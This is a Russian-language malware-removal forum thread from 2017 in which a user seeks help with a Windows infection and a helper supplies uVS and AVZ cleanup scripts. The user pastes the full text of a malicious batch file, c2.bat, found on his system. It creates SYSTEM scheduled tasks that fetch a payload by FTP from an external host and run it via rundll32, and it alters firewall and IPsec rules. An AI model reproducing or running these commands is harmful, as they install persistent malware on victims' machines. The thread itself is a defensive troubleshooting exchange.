Win32:Pup-gen или Backdoor.Win32.Mirai

[Ришат]

Здравствуйте. Проблема возникла в день когда я закрывал не нужные порты, как оказалось в дальнейшем нужные. Проблема была обнаружена случайно в диспетчере задач начали грузится неизвестные мне процессы.  За первое сканирование Аваст ничего не нашел. При чистке ccleaner в автозагрузке прописались 2 строки (Примерные строки):

regsvr32 /u /s /i:вирусная ссылкаscrobj.dll а так же 

msiexec.exe /i вирусная ссылка

 

в реестре

"HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start1" "HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start"  

 

в папке винды был найден файл и логи  Windows/debug/item.dat

через день был создан в этой же папке БАТНИК c2.bat

 

БАТНИК c2.bat:

 

ping 127.0.0.1 -n 10
net1 user IISUSER$ /del&net1 user IUSR_Servs /del
cacls c:\windows\twain_32\csrss.exe /e /d system&cacls c:\windows\twain_32\csrss.exe /e /d everyone&del c:\windows\twain_32\*.*
schtasks /create /tn "Mysa1" /tr "rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa" /ru "system"  /sc onstart /F
schtasks /create /tn "Mysa2" /tr "cmd /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p" /ru "system"  /sc onstart /F
netsh ipsec static add policy name=win
netsh ipsec static add filterlist name=Allowlist
netsh ipsec static add filterlist name=denylist
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
netsh ipsec static add filteraction name=Allow action=permit
netsh ipsec static add filteraction name=deny action=block
netsh ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny
netsh ipsec static set policy name=win assign=y 
ver | find "5.1." > NUL && sc config SharedAccess start= auto && net start SharedAccess && netsh firewall set opmode mode=enable && netsh firewall set portopening protocol = ALL port = 445 name = 445 mode = DISABLE scope = ALL profile = ALL
@Wmic Process Where "Name='winlogon.exe' And ExecutablePath='C:\Windows\system\winlogon.exe'" Call Terminate &del C:\Windows\system\winlogon.exe
@Wmic Process Where "Name='svchost.exe' And ExecutablePath='C:\Windows\system\svchost.exe'" Call Terminate &del C:\Windows\system\svchost.exe
@Wmic Process Where "Name='svchost.exe' And ExecutablePath='C:\Windows\twain_32\svchost.exe'" Call Terminate &del C:\Windows\twain_32\svchost.exe
@Wmic Process Where "Name='csrss.exe' And ExecutablePath='C:\Windows\twain_32\csrss.exe'" Call Terminate &del C:\Windows\twain_32\csrss.exe
@Wmic Process Where "Name='csrss.exe' And ExecutablePath='C:\Windows\tasks\csrss.exe'" Call Terminate &del C:\Windows\tasks\csrss.exe
del C:\WINDOWS\Debug\c2.bat
exit

 

 

 

 

Просканировал и Avast (нашел C:\windows\notepad.exe как Win32:Pup-gen ) Dr.Web и Kaspersky вроде ничего не нашли.

 

Прошелся по сайтам просканировал по удалял программами AdwCleaner,  Universal Virus Sniffer, AVZ, HijackThis.exe dwsysinfo.exe

 

В результате в папке  C:\WINDOWS\Debug\ остается файл лог PASSWD.LOG и не удаляется. В автозагрузка start start1 так и отаются.

Может вирус остал незнаю, но рисковать не охота, да и переустанавливать винду тоже. Стоит ли волноваться ?

 

Во вложении логи и скрины  AdwCleaner,  Universal Virus Sniffer, AVZ, HijackThis.exe dwsysinfo.exe

 

Если что не так вы уж извините я не "шарю".

 

Надеюсь на вашу поддержку заранее спасибо.

вирус0логу.rar

Изменено 3 июня, 2017 пользователем regist

[SQ]

Здравствуйте,


Удалите в AdwCleaner всё, кроме папок с названиями программ которыми вы пользуетесь (если ничем из перечисленного в логе не пользуетесь, то удалите всё). Отчет после удаления прикрепите.

Выполните скрипт в uVS:

;uVS v4.0.2 [http://dsrt.dyndns.org]
;Target OS: NTv5.1
v400c
OFFSGNSAVE
BREG
;---------command-block--------
zoo %SystemRoot%\DEBUG\C2.BAT
delref WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
delref HTTP://INET123.RU/?CX=PARTNER-PUB-7107628092852806%3ASXITI5-KTQK&COF=FORID%3A10&IE=UTF-8&Q={SEARCHTERMS}&SA=%CF%EE%E8%F1%EA&SITEURL=INET123.RU%2F#881
delref %SystemDrive%\DOCUMENTS AND SETTINGS\LIS\LOCAL SETTINGS\TEMP\40C7023A.SYS
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\GOOGLEUPDATE.EXE
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.21.169\PSMACHINE.DLL
del %SystemRoot%\DEBUG\C2.BAT
delref %SystemRoot%\TEMP\34A61A48-9270-4DE0-8922-65BADD484D9E
delref %SystemRoot%\TEMP\35872F97-8A73-4D6F-8156-CC38CF6D951E
delref %SystemRoot%\TEMP\4F9B30B2-983E-4016-B4CB-95AB3F09B805
delref %SystemRoot%\TEMP\5EDAB485-849A-44AD-9367-165D57A39241
delref %SystemRoot%\TEMP\421D46C5-7BB9-4E0B-B8B6-8DE4F52E9D63
delref %SystemRoot%\TEMP\C80C1669-02D7-47E2-984B-A2291EA0D87C
delref %SystemRoot%\TEMP\FD6D963D-8016-4E10-8B7D-B41625551AC3
apply

restart 

Прикпепите автологер согласно правилам.

[Ришат]

Всё сделал.

PASSWD.LOG Не удаляется.

 

2017-06-04_13-51-31_log.txt

AdwCleanerS3.txt

[SQ]

Где ранее запрошенный лог Autologger согласно правилам?

[Ришат]

Прошу прощения за мою невнимательность и столь долгое отсутствие.

Фалы прикрепляю.

 

Огромное Спасибо ! :)

 

CollectionLog-2017.06.07-22.33.zip

[SQ]

AVZ выполнить следующий скрипт.
Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора.

begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
 QuarantineFile('msiexec.exe','');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\start1','command');
BC_ImportQuarantineList;
BC_Activate;
 ExecuteRepair(1);
RebootWindows(false);
end.

После выполнения скрипта компьютер перезагрузится.

После перезагрузки:
- Выполните в AVZ:

begin
 CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.

quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com.
1. В заголовке письма напишите "Запрос на исследование вредоносного файла".
2. В письме напишите "Выполняется запрос хэлпера".
3. Прикрепите файл карантина и нажмите "Отправить"
4. Полученный ответ сообщите здесь (с указанием номера KLAN)



AVZ -> Файл -> Мастер поиска и устранения проблем -> Системные проблемы -> Пуск -> Отметьте пункт указанный выше -> Исправить отмеченные проблемы.
 

 >>  Установлена большая задержка перед открытием меню (более секунды)

 
- Подготовьте лог AdwCleaner и приложите его в теме.
 

[Ришат]

Лог прикладываю. 

[KLAN-6390185561]

AdwCleanerS4.txt

[SQ]

Удалите в AdwCleaner. Отчет после удаления прикрепите.

Найден ключ: HKU\S-1-5-21-1757981266-1580436667-1417001333-1003\Software\Conduit
Найден ключ: HKCU\Software\Conduit

[Ришат]

Удалил.

Полет нормальный)

еще раз спасибо)

AdwCleanerS6.txt

[SQ]

Скачайте программу Universal Virus Sniffer и сделайте новый лог полный образ автозапуска uVS.
 

[Ришат]

Сделано)

LIS-2EB095259D2_2017-06-15_22-06-30.7z

[SQ]

Сообщите, что с проблемой?